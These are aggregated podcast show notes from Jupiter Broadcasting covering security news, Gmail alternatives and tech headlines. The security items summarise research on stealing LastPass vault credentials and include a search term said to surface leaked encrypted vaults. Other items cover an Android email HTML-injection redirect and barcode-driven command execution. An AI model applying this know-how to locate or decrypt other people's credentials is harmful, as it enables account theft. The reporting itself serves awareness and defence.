Show Notes: extras.show/65

The post Brunch with Brent: Stuart Langridge | Jupiter Extras 65 first appeared on Jupiter Broadcasting.

HD Video Feed | MP3 Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Massive cyberattack hits Europe with widespread ransom demands

• New Ransomware Variant Compromises Systems Worldwide

• some infections may be associated with software update systems for a Ukrainian tax accounting package called MeDoc

• MDDoc posts about a virus

• notes at SANS ISC InfoSec Forums

Google Says It Will No Longer Read Users’ Emails To Sell Targeted Ads

• Google will no longer scan emails in Gmail accounts in order sell targeted advertising, the company said Friday.

• Google’s blog post

• more than 3 million paying companies that use G Suite

• Bloomberg post on same topic

Does US have right to data on overseas servers? We’re about to find out

Feedback

• AES-256 encryption keys cracked by hands-off hack from Shawn via Twitter

• workflow and backup strategy advice

• Regarding DNS, I think Dan mentioned that he didn’t have any of the books he used to learn about it. Any suggestions about some good reading material on that topic? Thanks for the awesome show. – DNS and BIND is the name of the book

Round Up:

• How LZ4 works

• Know your Times Tables, but… do you know your “Hash Tables”?

• AWS Security Primer

The post Google Reads Your Email | TechSNAP 325 first appeared on Jupiter Broadcasting.

A research team finds various ways to attack LastPass, how to use a cocktail of current Android exploits to own a device & hacking a point of sale system using poisoned barcodes!

Plus some great questions, our answers, a rockin roundup & much, much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Even the last pass will be stolen

• “During one of Alberto’s red team pentests, he gained access to several machines and found that all of them had files with references to LastPass. He came to me and told me it would be cool to check how LastPass works and if it was possible to steal LastPass credentials. 10% of our time is for research so we made that our small project.”
• “We found how creds where stored locally and wrote a Metasploit plugin so he could use it to extract vault contents from all the compromised machines. Thanks to the module, he was able to obtain SSH keys to critical servers and the pentest was a success.”
• They tested three different scenarios:
• Client side attacks: A post-exploitation scenario in which an attacker has certain access to the victim’s machine (no root access needed)
• LastPass side attacks: A scenario in which LastPass employees, attackers compromising their servers, or anyone MiTMing the connection is the attacker
• Attacks from the outside: Attackers that are not on the client nor on LastPass servers side.
• They used a number of different approaches
  • Using cookies
  • Abusing account recovery to obtain the encryption key
  • Bypassing 2 factor authentication
• “URLs/Icons are encoded, not encrypted: This means that there is no privacy. If you like shady pr0n or you are registered in questionable forums, anyone looking at your encrypted vault will know it. Also, if you reset your password in some site and update the LastPass vault account when prompted for it, the unique reset password URL may be stored as well. If the webmaster did not a good job of expiring the unique link, you gave LastPass the link to reset your password again.”
• “Credentials often encrypted with ECB mode: ECB is a weak encryption method that should never be used. LastPass will know if you are reusing passwords from looking at the cipher text. This is bad because LastPass can go check any of the existing password dumps out there, see if you are registered in one of the hacked sites”
• “what would happen if we google “extensions.lastpass.loginpws”. You guessed it! People are sharing their encrypted LastPass credentials with the rest of the world without their knowledge. You can also find credentials in pastebin. The best part is that now you know how to decrypt them and everything you need is right there.”
• Recommendations For you:
• Use the binary version of the plugin
• Do not store the master password
• Activate the new Account Recovery over SMS
• Audit your vault for malicious JS payloads
• Don’t use “password reminder”
• Activate 2FA
• Add country restrictions
• Disallow TOR logins
• Recommendations For LastPass
• Get rid of custom_js!
• Encrypt the entire vault in one chunk
• Don’t use ECB
• Use PBKDF2 between client and LastPass also
• Use cert pinning
• Embrace open source
• Adopt a retroactive, cash rewarded bug bounty program
• Additional Coverage

Google AOSP Email App HTML Injection

• The Google AOSP Email App is vulnerable to HTML Injection on the email body.
• It allows a remote attacker to be able to send a crafted email with a payload that redirects the user to a target url as soon as he opens the email.
• This issue is not related with the email provider configured on the app but with the incorrect filter of potential dangerous tags on the client side.
• The researchers sent an email with the HTML tag meta using the attribute http-equiv refresh to redirect the user to the target URL.
• This vulnerability has a dangerous potential for phishing attacks. With a bit of creativity, a convincing phishing scenario is plausible.
• Other vectors like using intent-based URI are also another possibility. Just this week we learned that in MobilePwn2Own, an exploit was showcased that explores a vulnerability in Javascript V8 engine in Chrome, where a user just needs to browse to a page and it installs a apk without any kind of user interaction.
• During the MobilePwn2Own demo of the V8 engine vulnerability, security researcher Guang Gong showed how easy it was to take advantage of an Android device.

“As soon as the phone accessed the website the JavaScript v8 vulnerability in Chrome was used to install an arbitrary application (in this case a BMX Bike game) without any user interaction to demonstrate complete control of the phone.” While a BMX game is relatively harmless in the grand scheme of things, a lot more damage could have been done.

• This exploit combined with the Email app vulnerability is a very dangerous combo.
• This app is available in all Android versions up to Kitkat(4.4.4). This application exists because up until Gmail for Android 5.0, it was the only way to configure other email providers (Exchange Servers, Yahoo,Hotmail,etc) on Android
• From Android Lolipop (5.0) upwards , the AOSP app no longer exists in the system.
• Since probably that are still a lot of users using the AOSP Email App the researchers decided to contact Google regarding this issue.
• Google replied they don’t have plans for the fix of this vulnerability.
• Users from Android Ice Cream Sandwich (4.0.3) upwards, should migrate the accounts from the AOSP Email App to the Gmail App, since the Gmail App version 5.0+ is supported.
• Users with previous Android versions should upgrade to Ice Cream Sandwich (4.0.3) or above where possible or use a different email client.

One Barcode Spols the Whole Bunch

• This week’s PanSec 2015 Conference in Tokyo where researchers with Tencent’s Xuanwu Lab demonstrated a number of attacks using poisoned barcodes scanned by numerous keyboard wedge barcode scanners to open a shell on a machine and virtually type control commands.
• The attacks, dubbed BadBarcode, are relatively simple to carry out, and the researchers behind the project said it’s difficult to pinpoint whether the scanners or host systems need to be patched, or both—or neither.
• “We do not know what the bad guys might do. BadBarcode can execute any commands in the host system, or [implant] a Trojan,” said Yang Yu, who collaborated with colleague Hyperchem Ma. Yu, last year, was rewarded with a $100,000 payout from Microsoft’s Mitigation Bypass Bounty for a trio of ASLR and DEP bypasses. “So basically you can do anything with BadBarcode.”
• Yu said his team was able to exploit the fact that most barcodes contain not only numeric and alphanumeric characters, but also full ASCII characters depending on the protocol being used.
• Barcode scanners, meanwhile, are essentially keyboard emulators and if they support protocols such as Code128 which support ASCII control characters, an attacker could create a barcode that is read and opens a shell on the computer to which the commands are sent.
• Yu and Ma said during their presentation that Ctrl+ commands map to ASCII code and can be used to trigger hotkeys, which registered with the Ctrl+ prefix, to launch common dialogues such as OpenFile, SaveFile, PrintDialog. An attacker could use those hotkeys to browse the computer’s file system, launch a browser, or execute programs.
• Yu suggest that barcode scanner manufacturers no enable additional features beyond standard protocols by default, nor should they transmit ASCII control characters to the host device by default.

• Hosts in IoT environments, meanwhile, should think twice about using barcode scanners that emulate keyboards, and should disable system hotkeys, Yu said.

• Slides

Feedback:

• Linux Bare Metal Incremental Backup

• ZFS Question…. Yes another freaking ZFS ?

• A couple questions

• Great Network software called Comcast

Round-Up:

• Here’s a Spy Firm’s Price List for Secret Hacker Techniques
• The Great Firewall of Santa Cruz – A fun CS homework assignment
• It’s time to secure your Amazon account with two-factor authentication
• Stanford professor releases draft of textbook “A Graduate Course in Applied Cryptography”
• Flying a cylon raider — hacking without your favourite tools
• Ngrok, a tool to make island hopping easier, proxy any servers from a foreign internal network to your own network via a compromised host
• Platform Independant, Position Independant ASM for loading a .DLL
• Windows Driver Signing Bypass, by: Derusbi, an infamous piece of malware. The oldest identified version was compiled in 2008. It was used on well-known hacks such as the Mitsubishi Heavy Industries hack discovered in October 2011 or the Anthem hack discovered in 2015
• Intel’s 72-Core ‘Knight’s Landing’ Xeon Phi Supercomputer Chip Cleared For Takeoff
• Analysis of GHOST, one of the earlier “named” vulnerabilities
• Gmail will soon warn you when an unencrypted message arrives
• A Boeing 737 tailstrike was cased by: a typo when the flight crew entering the weight on an iPad
• Reverse engineering iOS9 with Javascript
• Kaspersky issues its 2016 security predictions, “IT’S THE END OF THE WORLD FOR APTs AS WE KNOW THEM”
• Sign up for Tinder clone to get laid, instead get screwed

The post A Keyboard Walks into a Barcode | TechSNAP 242 first appeared on Jupiter Broadcasting.

After the last straw Noah dumps Gmail, shares his battle and solution & Chris runs down five great open source Gmail alternatives.

Plus why Dell stopped shipping the XPS 13 in Europe, a big update to a Linux video editor, the news of the week & more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | OGG Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Brought to you by: System76

Open source webmail clients for browser-based email

Gmail has enjoyed phenomenal success, and regardless of which study you choose to look at for exact numbers, there’s no doubt that Gmail is towards the top of the pack when it comes to market share. For certain circles, Gmail has become synonymous with email, or at least with webmail. Many appreciate its clean interface and the simple ability to access their inbox from anywhere.

But Gmail is far from the only name in the game when it comes to web-based email clients. In fact, there are a number of open source alternatives available for those who want more freedom, and occasionally, a completely different approach to managing their email without relying on a desktop client.

Let’s take a look at just a few of the free, open source webmail clients out there available for you to choose from.

FastMail: Fast, reliable email

FastMail is the choice of over 100,000 individuals, families and businesses. We deliver the highest standards of security, privacy and reliability for your email, calendars and contacts, backed up by our exemplary 15-year track record.

• How to set up a photo gallery | FastMail

• How to set up chat (instant messaging) | FastMail

KolabNow

With over 108 billion business emails sent daily, email is the backbone of professional communication. Kolab provides the email, contact and file sharing functionality that empowers enterprise communication.

Looking for a fully featured collaboration and communication platform? Seeking the convenience of the cloud, without having to worry about who else might have access? Want to ensure that your data is stored only in a single legislation, with highest barriers to data disclosure? Kolab Now is that service.

Safeguard your professional and personal data with Kolab Now. Enjoy the world’s world’s best privacy legislation and terms of service that put you first. All of this with a feature set that is complete to allow you to run your entire business collaboration.

DarkMail

Silent Circle and Lavabit are developing a new way to do email with end-to-end encryption. We welcome like-minded organizations to join our alliance.

To bring the world our unique end-to-end encrypted protocol and architecture that is the ‘next-generation’ of private and secure email. As founding partners of The Dark Mail Technical Alliance, both Silent Circle and Lavabit will work to bring other members into the alliance, assist them in implementing the new protocol and jointly work to proliferate the world’s first end-to-end encrypted ‘Email 3.0’ throughout the world’s email providers. Our goal is to open source the protocol and architecture and help others implement this new technology to address privacy concerns against surveillance and back door threats of any kind.

— PICKS —

Runs Linux

Shanghai Subway Runs Linux

Hi guys, For 5 years I’m living in Shanghai and I suddenly discover that ubuntu is running the streaming tv in the Shanghai’s subway ! Here’s few links for the pictures

https://i.imgur.com/DFynJVU.jpg

View post on imgur.com

View post on imgur.com

https://i.imgur.com/EBbfytP.jpg

a link to the incredible expansion of the shanghai’s subway
https://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/SHM_evolution_mid.gif/400px-SHM_evolution_mid.gif

Sent in by Dasti

Desktop App Pick

Lighttable

• Connects you to your creation with instant feedback and showing data values flow through your code.

• Easily customizable from keybinds to extensions to be completely tailored to your specific project.

• Try new ideas quickly and easily. Ask questions about your software, to give you a more profound understanding of your code.

• Embed anything you want, from graphs to games to running visualizations.

• Everything from eval and debugging to a fuzzy finder for files and commands to fit seamlessly into your workflow.

• An elegant, lightweight, beautifully designed layout so your IDE is no longer cluttered.

LightTable in Action

Weekly Spotlight

Flowblade 1.2

Flowblade 1.2 is the ninth release of Flowblade.

• Flowblade has now been ported to GTK3.

• The process was not as straight forward as one might think but eventually everything worked out. There always seemed to be just one more little change in API that required all instances to be fixed by hand. Luckily there was a conversion script available that did most of the grunt work to get things going.

• We did get something in return. A small but percipteble responsiveness improvement was gained probably because GTK3 provides a Cairo widget for creating custom widgets that is now used instead of the project specific Cairo widget that was used before. GTK3 also seems to render widgets a bit crispier.

• I really hope that major API breaking version jumps for widget toolkits are avoided as much as possible. Projects with large interface and small man power can really suffer here.

• There were some other major developments during the cycle too:

• All rendering was moved out of process as the in-process rendering was found to not work correctly in same cases.

• Dark theme support was improved. It is now possible to use a dark theme just by setting a preference if the GTK3 theme used has a dark variant available.
• Small screen support has been upgraded. The application now works better on 768px height screens.

Spokane Roadtrip Meetup

— NEWS —

Dell XPS 13 Developer Edition No Longer Available for Sale in Europe

“Unfortunately Europe has already run through their forecasted inventory (they sold better than we expected). The US still has inventory on hand. Because there will be a next gen coming out we won’t be getting any more of this model. Thanks for the support!” wrote Dell’s Barton George on his website. He’s the same guy who announced that the XPS 13 was brought back to the shop a while back.

Mozilla: data stolen from hacked bug database was used to attack Firefox

Mozilla added that the attacker accessed 185 non-public Firefox bugs, of which 53 involved “severe vulnerabilities.” Ten of the vulnerabilities were unpatched at the time, while the remainder had been fixed in the most recent version of Firefox at the time.

Attack code exploiting Android’s critical Stagefright bugs is now public

The critical flaws, which reside in an Android media library known as libstagefright, give attackers a variety of ways to surreptitiously execute malicious code on unsuspecting owners’ devices. The vulnerabilities were privately reported in April and May and were publicly disclosed only in late July. Google has spent the past four months preparing fixes and distributing them to partners, but those efforts have faced a series of setbacks and limitations.

We Did It!! (Mycroft was successfully funded!) – YouTube

We have successfully funded our Kickstarter campaign! Let us thank you and learn about whats in store for they Mycroft team! Remember to check out our Kickstarter at: https://mycroft.ai/kickstarter

• Mycroft: An Open Source Artificial Intelligence For Everyone by Joshua Montgomery

Feedback:

• Vote on the Mobile Studio Name

• https://slexy.org/view/s290nhkjD6

• https://slexy.org/view/s20iHMJWRL

Road Trip Playlist

Watch the adventures, productions, road trips, trails, mistakes, and fun of the Jupiter Broadcasting mobile studio.

• Support Jupiter Broadcasting on Patreon

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

— CHRIS’ STASH —

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com

Find us on Google+

• Chris
• Noah J. Chelliah
• Jupiter Broadcasting’s Page

Find us on Twitter

• Chris – ChrisLAS
• Noah – Kernellinux

Follow us on Facebook

• Jupiter Broadcasting on Facebook
• Noah – Kernellinux

Catch the show LIVE Friday:

• https://jblive.tv
• Network Calendar

The post Gmail in the Black Tank | LAS 382 first appeared on Jupiter Broadcasting.

The White house announces and executive order allowing sanctions against cyber war threats, some downsides of the Galaxy S6 Edge, an April Fools roundup & more!

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Video Feed | Torrent Feed

Become a supporter on Patreon

Show Notes:

A New Tool Against Cyber Threats — Medium

It’s one of the great paradoxes of our Information Age — the very technologies that empower us to do great good can also be used by adversaries to inflict great harm. The same technologies that help keep our military strong are used by hackers in China and Russia to target our defense contractors and systems that support our troops. Networks that control much of our critical infrastructure — including our financial systems and power grids — are probed for vulnerabilities by foreign governments and criminals.

Cyber intrusions and attacks — many of them originating overseas — are targeting our businesses, stealing trade secrets, and costing American jobs. Iranian hackers have targeted American banks. The North Korean cyber attack on Sony Pictures destroyed data and disabled thousands of computers. In other recent breaches that have made headlines, more than 100 million Americans had their personal data compromised, including credit card and medical information.

Living life on the S6 Edge | The Verge

The Galaxy S6 Edge also doesn’t play too nicely with Google’s Material Design. Samsung has my eternal appreciation for following Google’s lead in moving to a cleaner, more minimalist interface, but Material Design emphasizes flatness and geometric regularity, which the Edge’s warping side screens disturb. They create a sort of vignette effect on white pages and are a hindrance rather than a help when editing photos.

Meet the Asus Chromebook Flip, a $249 Chrome OS tablet with a 360-degree hinge | PCWorld

The Chromebook Flip squeezed an adequate supply of connectivity into its slender profile. On one side, you’ll see two USB 2.0 ports, an SD card slot, HDMI, and an audio jack. On the other, you’ll see power and volume buttons, plus the DC power port.

Under the hood you’ll find 2GB of RAM and the Rockchip 3288 CPU. Rockchip, a new partner for Google, brings less expensive, more power-efficient CPUs to the Chromebook lineup. Google also announced new Chromebooks from Haier and Hisense with the same chip. Benchmarks from our hands-on with the new Hisense Chromebook indicate that this processor holds up well compared to older ARM chips.

Google pushes Chrome OS software, with or without Chromebooks – CNET

To that end, one of Google’s newest additions to the lineup of devices, the Chomebit, hawks Chrome OS without even trying to sell a Chromebook laptop.

RadioShack co-branding of stores with Sprint wins court approval | Reuters

A plan to salvage RadioShack Corp’s RSHCQ.PK business by co-branding most of its 1,740 surviving stores with cellular phone provider Sprint Corp (S.N) earned U.S. bankruptcy court approval on Tuesday, ending four days of contested court hearings.

The stores are what survived of more than 4,000 outlets after RadioShack went bankrupt in February. Founded in 1921, the chain was a go-to retailer for electronics before becoming increasingly irrelevant in the digital age.

Gentoo announces total website makeover – Gentoo Linux

Gentoo Linux today announced the launch of its new totally revamped and more inclusive website which was built to conform to the CGA Web(tm) graphics standards.

Smartbox by Inbox: the mailbox of tomorrow, today – YouTube

We’re excited to introduce Smartbox—a better, smarter mailbox that fuses physical mail with everything you love about the electronic kind.

Smartbox is currently in field trial—stuck in the ground, in a field—for Inbox by Gmail customers. If you’re not yet using Inbox, simply email inbox@google.com any time before April 2 to be invited, and to reserve your spot on the Smartbox waitlist.

The post Sanction IT | Tech Talk Today 151 first appeared on Jupiter Broadcasting.

A new major security breach at a large health insurance firm could expose 10s of millions, a phone phishing scam anyone could fall for & we celebrate our 200th episode with your TechSNAP stories.

Then its a storage spectacular Q&A & much, much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Security breach at health insurance firm Anthem, could expose 10s of millions

• “Anthem Inc., the nation’s second largest health insurer, disclosed Wednesday that hackers had broken into its servers and stolen Social Security numbers and other personal data from all of its business lines. “
• “Anthem didn’t specify how many consumer records may have been breached, but it did say all of the company’s business units are affected. The figures from Anthem’s Web site offer a glimpse at just how big this breach could be: “With nearly 69 million people served by its affiliated companies including more than 37 million enrolled in its family of health plans, Anthem is one of the nation’s leading health benefits companies.””
• “The company said it is conducting an extensive IT forensic investigation to determine what members are impacted.”
• It is reported that Anthem has hired Mandiant to investigate the attack
• Exposed data:
• Full Name
• date of birth
• member ID
• Social Security number
• address
• phone numbers
• email addresses
• employment information
• “According to Anthem’s statement, the impacted (plan/brands) include Anthem Blue Cross, Anthem Blue Cross and Blue Shield, Blue Cross and Blue Shield of Georgia, Empire Blue Cross and Blue Shield, Amerigroup, Caremore, Unicare, Healthlink, and DeCare. The company said impacted members will receive notice via mail which will advise them of the protections being offered to them as well as any next steps.”
• “Anthem said once the attack was discovered, the company immediately made every effort to close the security vulnerability, contacted the FBI and began fully cooperating with their investigation.”
• More detailed information is not available yet, but I am sure we’ll be following this story in the weeks to come
• Additional Coverage – ThreatPost
• Additional Coverage

Hacked hotel phones used in bank phishing scam

• “A recent phishing campaign targeting customers of several major U.S. banks was powered by text messages directing recipients to call hacked phone lines at Holiday Inn locations in the south. Such attacks are not new, but this one is a timely reminder that phishers increasingly are using lures blasted out via SMS as more banks turn to text messaging to communicate with customers about account activity.”
• “The above-mentioned phishing attacks were actually a mix of scams known as “SMiShing” — phishing lures sent via SMS text message — and voice phishing or “vishing,” where consumers are directed to call a number that answers with a voice prompt spoofing the bank and instructing the caller to enter his credit card number and expiration date”
• It seems Holiday Inn’s telephone switching system may have been hacked, and used to record and exfiltrate the stolen information
• It is likely the hotel also lost out on business from customers actually trying to reach the hotel, and instead getting fake voice prompts for various banks
• “According to Jan Volzke, Numbercop’s chief executive, these scams typically start on a Saturday afternoon and run through the weekend when targeted banks are typically closed.”
• ““Two separate Holiday Inns getting hijacked in such short time suggests there is a larger issue at work with their telephone system provider,” he said. “That phone line is probably sitting right next to the credit card machine of the Holiday Inn. In a way this is just another retail terminal, and if they can’t secure their phone lines, maybe you shouldn’t be giving them your credit card.”
• “A front desk clerk who answered the line on Tuesday said the hotel received over 100 complaints from people who got text messages prompting them to call the hotel’s main number during the time it was hacked.”
• “Numbercop says the text message lures were sent using email-to-SMS gateways, but that the company also has seen similar campaigns sent from regular in-network numbers (prepaid mobile phones e.g.), which can be harder to catch. In addition, Volzke said, phishers often will target AT&T and Verizon users for use in furthering these schemes.”
• Volzke says it’s unfortunate that more financial institutions aren’t communicating with their customers via mobile banking apps. “Banking apps are among the most frequently downloaded and used apps,” Volzke said. “If the user has an app from the bank installed, then if the bank really has something to say they should use the in-app messaging method, not text messages which can be spoofed and are not secure. And yet we see almost no bank making use of this.”
• “Regardless of whether you communicate with your bank via text message, avoid calling phone numbers or clicking links that appear to have been sent via text message from your bank. Also, be extremely wary of any incoming calls from someone calling from your bank. If you think there may be an issue with your account, your best bet is to simply call the number on the back of your credit or debit card.”
• Example call recording from Numbercop

Your TechSNAP Story

• TechSNAP 200

• TechSNAP 200 – FreeNAS Deployed!

• Episode 200 – Thx Allan!

• TechSNAP 200 : How its helped

• Episode 200 – Thx for BSD!

• TechSNAP Changed my Life!

• How has TechSNAP affected me?

• For 200 episode TechSnap

Feedback:

• Network Switches

• Adopted Drive Solution

• QUESTION: ZFS riskiness

• ELI5 Storage: Blocks, Extents, Pages …

Round-Up:

• Forget North Korea – Russian Hackers Are Selling Access To Sony Pictures, Claims US Security Firm
• Why Gmail has better security than your bank does
• Warning – Microsofts Outlook app for iOS breaks your company security
• More flash updates, 16.0.0.305 fixes CVE-2015-0313 through CVE-2015-0330, 15 of the 18 could lead to code execution
• Slew of Flash zero day exploits dominate malware landscape, new exploid kit emerges called Hanjuan
• The problem with crypto-challenges – a challenge constructed of known various bad practises and algorithms, is still hard to crack, does not prove security
• Fix for ‘Fancybox’ plugin for WordPress resolved zero day exploit seen in the wild
• Universal Cross site scripting vulnerability in IE could be used for Phishing or injecting malware into legitimate sites
• More serious bugs found in Siemens “RuggedCom” switches, one allows administrative and settings changes without authentication
• Google designs new SSL warning messages after more research into the subject. The hypothesis of their researched failed, but important lessons were learned

The post Your TechSNAP Story | TechSNAP 200 first appeared on Jupiter Broadcasting.

Google is re-thinking email and launches Inbox, a new gmail that’s not gmail, but is connected to your gmail. We’ll explain. Apple Pay hits a few glitches & PC World takes a bold step.

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Inbox is a total reinvention of email from Google | The Verge

The new Gmail app from the Gmail team isn’t technically just an email app, at least if you ask them. It’s called “Inbox,” and it’s being released as an invite-only system that works on the Chrome browser, Android phones, and iPhones. It feels completely native and fast on all of those systems. But it’s a native and fast app that does something 10 degrees away from what you’d expect an email app to do. My first impression of Inbox is that it’s really great, but a little weird.

The basic idea is this: it’s still a Gmail app, but instead of giving you the traditional list of emails, it tries to intelligently give you more information so you don’t have to even open them. Google Now-style info cards appear right in line with your message list, including things like flight times, package tracking, and photos.

It also tries to intelligently “bundle” emails into groups that you can quickly dismiss.

Apple Pay glitch sees some early adopters hit with duplicate charges

APPLE PAY has got off to a shaky start in the US after some shoppers reported that the NFC mobile payments service had charged them twice for purchases.

The Apple Pay problem largely affects Bank of America customers, according to a report on Bloomberg.

The report claims that around 1,000 Bank of America debit transactions on Apple Pay were mistakenly duplicated, seeing some people charged twice.

The problem was blamed on a processing error that occurred between the bank and at least one payments network, according to Bloomberg‘s inside source, who added that the glitch is likely to be fixed today.

Chromebook shipments leap by 67 percent | ZDNet

ABI Research found that, in the most recent quarter, Chromebook shipments increased by 67 percent quarter over quarter. The research company expects that year over year, Chromebooks shipments will double.

Specifically, ABI found that Acer is continuing to maintain its lead over other vendors in the market, including Samsung, HP, and Dell. By ABI’s count, the top three leading vendors, Acer, Samsung, and HP, accounted for 74 percent of all Chromebooks shipped during the first half of 2014. ABI doesn’t see the top three changing in the waning months of 2014.

ABI also found that vertical markets — especially education — are a driving force. In emerging markets, especially in Asia-Pacific and Eastern Europe, business-purchasing entities account for 75 percent of Chromebook sales. Google is also making an enterprise push for Chromebooks with its Chromebooks for Work initiative.

PCWorld begins weekly column on Linux and other non windows OSes.

https://www.pcworld.com/article/2825493/meet-world-beyond-windows-the-new-pcworld-column-dedicated-to-linux-chrome-os-and-anything-but-wind.html

The post Gmail isn't Gmail: it's gmail | Tech Talk Today 80 first appeared on Jupiter Broadcasting.

Gmail passwords may have been leaked, but there is some debate as to how bad the damage is. Google Voice gets rolled into Hangouts & we take a look at the results from “Internet Slowdown Day”.

Plus our thoughts on mobile payments, a great deal for Linux users & more!

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

5 Million Gmail Usernames and Passwords Leaked

In what appears to be an unknown attack, hackers have dumped over 5,000,000 valid gmail username and passwords on the Internet early Wednesday morning.

Unknown hackers have leaked over five million valid credentials pertaining to Google Mail logins early this morning. The random dump of passwords first appeared on reddit’s netsec section linking to the another website hosting the leaked gmail accounts.

The .txt file of all leaked gmail usernames was found on BitCoin security (forum in Russian), where the leak is believed to be first offloaded. The file of leaked emails does not contain any passwords or other sensitive information, only full gmail email addresses.

As the leak was posted only hours ago, Reddit users are warning each other not to enter any email username or password combinations into any websites “to check if your password is secure.” It appears scams are already appearing or Reddit users are getting ready for the scams to come.

• Google Says No Compromise

“The security of our users’ information is a top priority for us,” a Google spokesperson told TNW. “We have no evidence that our systems have been compromised, but whenever we become aware that accounts may have been, we take steps to help those users secure their accounts.”

Next, since the posting, the forum administrators have purged the passwords from the text file in question, leaving only the logins. Furthermore, tvskit, the forum user who published the file, claimed that some 60 percent of the passwords were valid.

Google Voice Integration Is Currently Rolling Out In Hangouts

Google Voice is finally being integrated into Hangouts, because God knows Hangouts needed to be even more confusing. You can enable Voice SMS and voicemail via a popup in the conversation list, so check the app. If you still don’t see it, hang on. It’s still rolling out.

“Internet Slowdown Day” sends over 111,000* new comments on net neutrality to FCC

The effort appears to have made a difference: According to the FCC*, by 6 PM ET the agency saw 111,449 new public comments added to the already record-setting total, with some 41,173 filed into the 14-28 docket of the FCC’s website since and another 70,286 sent to the openinternet@fcc.gov inbox, setting a new high water mark of some 1,515,144 to date, with more yet to come. As reported by Mike Masnick, citing ThinkProgress, the Internet slowdown generated 1000 calls per minute to Congress. *Update: Fight for the Future claims that more than 500,000 comments have been submitted through Battleforthenet.com and that the FCC hasn’t caught up. According to the nonprofit, “this happened during our last big push too when their site crashed. We are storing comments and will deliver all.”

IDG shutters Macworld Magazine, much of the editorial staff let go | 9to5Mac

International Data Group (IDG) is shutting down Macworld Magazine, the long time Apple periodical according to tweets by staff and conversations I’ve had with personnel.

The Macworld.com website will remain open [although as a shell of its former self -ed] with a reduced staff according to Dan Miller (editor), who himself is leaving in a month.

Why pay with your phone? : techtalktoday

Floppy-Bacon Writes

Is payment the stores in the US really as bad as Apple’s presentation made it look? When I pay with my debit card (or credit card), I don’t hand it to the cashier. I insert it into a small device and enter my 4-digit PIN code; fast and secure. I do not need to identify my self, I do not any detail about my card and I do not have 15 cards in my wallet or however many cards she had in the video. I know that I hate technology, but do you really want to pay with your phone rather than just fix the payment system to how it works elsewhere? For the time being you still need to have your wallet with your for all the other stuff. (And taking my phone with me with just be extra cumbersome.)

Crossover Linux 50% off : linux_gaming

I received an e-mail this morning from CodeWeavers that CrossOver Linux + 12 months of support is 50% off for the next 48 hours.

Promotional Code: FLASHME

For more information: https://www.codeweavers.com/products/crossover-linux

The post The New Payphone | Tech Talk Today 57 first appeared on Jupiter Broadcasting.

Google says “think of the children” but does that justify fully analyzing the contents of everyones Gmail? A drone crashes carrying phones and drugs into a prison & “The Scourge Of Zero Rating”.

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Crashed drone carried contraband aimed at South Carolina prison | Reuters

A drone being flown in a novel attempt to smuggle phones, marijuana and tobacco into a South Carolina maximum security prison crashed outside its walls, authorities said on Wednesday.

Officials believe it was the first time an unmanned aircraft had been used in an effort to breach prison walls in the state, Givens said. Most cellphones are thrown over walls.

Authorities have arrested one man in the drone incident and are seeking another suspect. Brenton Lee Doyle, 28, appeared in court on Wednesday for a hearing. He faces charges of attempting to introduce contraband into a prison and possession of the drug flunitrazopam, a muscle relaxant known as “roofies.”

Doyle has said he has never seen a drone and that police said nothing about a drone at the time of his arrest, his attorney Wayne Floyd said.

Police Say A Google Tip About Child Abuse Led To Arrest – Business Insider

A Houston man has been arrested after Google sent a tip to the National Center for Missing and Exploited Children saying the man had explicit images of a child in his email, according to Houston police.

The man was a registered sex offender, convicted of sexually assaulting a child in 1994, reports Tim Wetzel at KHOU Channel 11 News in Houston.

“He was keeping it inside of his email. I can’t see that information, I can’t see that photo, but Google can,” Detective David Nettles of the Houston Metro Internet Crimes Against Children Taskforce told Channel 11.

After Google reportedly tipped off the National Center for Missing and Exploited Children, the center alerted police, who used the information to get a warrant.

On one hand, most people would certainly applaud the use of technology to scan email in a case like this.

On the other, debate rages about how much privacy users can expect when using Google’s services like email. In a word: none.

A year ago, in a court brief, Google said as much. Then, in April, after a class-action case against Google for email scanning fell apart, Google updated its terms of service to warn people that it was automatically analyzing emails.

• Houston man charged with child porn possession after Google cyber-tip
• Google Helps Police Arrest Man for Child Pics

Google Said to Plan Separating Photo Service From Google+ – Bloomberg

The move would enable the photo service to stand more
independently and be accessible for consumers who aren’t part of
Google+, potentially spurring more growth, said the people, who
asked not to be identified because the plans aren’t public. The
service, called Google+ Photos, would still work with the social
network’s users and may be rebranded as part of the move, one of
the people said.

Mailpile: Mailpile Alpha II – The Dogfood Edition

We present Mailpile Alpha II – The Dogfood Edition!

